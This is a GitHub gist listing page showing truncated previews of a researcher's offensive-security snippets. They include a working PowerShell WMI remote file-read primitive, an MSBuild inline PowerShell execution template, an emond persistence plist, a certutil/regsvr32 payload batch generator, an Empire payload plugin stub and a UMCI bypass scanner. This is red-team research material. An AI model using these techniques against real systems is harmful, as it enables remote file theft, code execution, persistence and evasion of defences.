Skip to content

Instantly share code, notes, and snippets.

View xorrior's full-sized avatar

Chris Ross xorrior

935 followers · 13 following
View GitHub Profile
@xorrior
xorrior / FileReadPrimitive.ps1
Created June 28, 2018 19:41 — forked from mattifestation/FileReadPrimitive.ps1
A WMI file content read primitive - ROOT/Microsoft/Windows/Powershellv3/PS_ModuleFile
$CimSession = New-CimSession -ComputerName 10.0.0.2
$FilePath = 'C:\Windows\System32\notepad.exe'
# PS_ModuleFile only implements GetInstance (versus EnumerateInstance) so this trick below will force a "Get" operation versus the default "Enumerate" operation.
$PSModuleFileClass = Get-CimClass -Namespace ROOT/Microsoft/Windows/Powershellv3 -ClassName PS_ModuleFile -CimSession $CimSession
$InMemoryModuleFileInstance = New-CimInstance -CimClass $PSModuleFileClass -Property @{ InstanceID= $FilePath } -ClientOnly
$FileContents = Get-CimInstance -InputObject $InMemoryModuleFileInstance -CimSession $CimSession
$FileLengthBytes = $FileContents.FileData[0..3]
[Array]::Reverse($FileLengthBytes)
@xorrior
xorrior / SMConfMigratorPlugin.h
Created June 18, 2018 20:03
SMConfMigratorPlugin header file
//
// Generated by class-dump 3.5 (64 bit).
//
// class-dump is Copyright (C) 1997-1998, 2000-2001, 2004-2013 by Steve Nygard.
//
#import "NSObject.h"
#import "SMSystem_FileManagerProtocol.h"
//<SMSystem_FileManagerProtocol>
@class NSObject, SMMigrationRequest;
@xorrior
xorrior / empire-migrationplugin.m
Created May 25, 2018 16:46
Migration Plugin with Empire Payload
//
// demoClass.m
// testExampleBundle
//
// Created by Chris Ross on 4/17/18.
// Copyright © 2018 Void. All rights reserved.
//
#import <Foundation/Foundation.h>
#import <objc/objc.h>
@xorrior
xorrior / pshell_template_embedded_script.xml
Created December 20, 2016 14:45
MSBuild Powershell Script XML template
<Project ToolsVersion="4.0" xmlns="http://schemas.microsoft.com/developer/msbuild/2003">
<!-- This inline task executes c# code. -->
<!-- C:\Windows\Microsoft.NET\Framework64\v4.0.30319\msbuild.exe pshell.xml -->
<!-- Author: Casey Smith, Twitter: @subTee -->
<!-- License: BSD 3-Clause -->
<PropertyGroup>
<FunctionName Condition="'$(FunctionName)' == ''">None</FunctionName>
<Cmd Condition="'$(Cmd)' == ''">None</Cmd>
</PropertyGroup>
<Target Name="Hello">
@xorrior
xorrior / SampleRules.plist
Created January 9, 2018 05:44
Sample Plist for emond
<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE plist PUBLIC "-//Apple//DTD PLIST 1.0//EN" "http://www.apple.com/DTDs/PropertyList-1.0.dtd">
<plist version="1.0">
<array>
<dict>
<key>name</key>
<string>sample rule</string>
<key>enabled</key>
<true/>
<key>eventTypes</key>
@xorrior
xorrior / New-CplBatchFile.ps1
Last active September 20, 2017 12:15
Generate Batch file for cpl file
function New-CplBatchFile
{
<#
.SYNOPSIS
Generates a batch file which will contain a certutil encoded, cab compressed payload.
.DESCRIPTION
The batch file will decode and decompress the cab file, then execute the dll within with regsvr32. You may modify the bat file to execute whatever you want.
Create payload:
@xorrior
xorrior / LoadMethodScanner.ps1
Created August 11, 2017 13:04 — forked from mattifestation/LoadMethodScanner.ps1
A crude Load(byte[]) method scanner for UMCI bypass research
# Author: Matthew Graeber (@mattifestation)
# Load dnlib with Add-Type first
# dnlib can be obtained here: https://github.com/0xd4d/dnlib
# Example: ls C:\ -Recurse | Get-AssemblyLoadReference
filter Get-AssemblyLoadReference {
param (
[Parameter(Mandatory = $True, ValueFromPipelineByPropertyName = $True)]
[Alias('FullName')]
[String]
[ValidateNotNullOrEmpty()]
@xorrior
xorrior / keybase.md
Last active February 9, 2016 21:59

Keybase proof

I hereby claim:

  • I am xorrior on github.
  • I am xorrior (https://keybase.io/xorrior) on keybase.
  • I have a public key whose fingerprint is A086 24A4 D702 0EAE FCEC 139D 56BA 7C93 A848 D2F7

To claim this, I am signing this object: